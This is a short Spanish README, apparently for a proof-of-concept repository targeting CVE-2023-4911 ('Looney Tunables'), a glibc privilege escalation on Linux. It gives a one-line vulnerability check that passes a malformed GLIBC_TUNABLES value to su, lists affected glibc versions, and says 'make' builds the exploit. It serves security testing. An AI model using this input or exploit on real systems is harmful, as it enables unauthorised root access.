
CVE-2023-4911
Este es un PoC (Prueba de Concepto) para la vulnerabilidad de escalada de privilegios en Linux Looney Tunables. Está basado en este PoC. Muchas gracias a leesh3288. Aquí puedes encontrar un análisis muy detallado, y aquí puedes ver un video muy bueno de IppSec.
Comprueba si es vulnerable
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help

Cabe mencionar que las versiones vulnerables de glibc, incluyendo esta, son desde 2.35-0ubuntu3.3 y anteriores.

Ejecuta el exploit
$ make
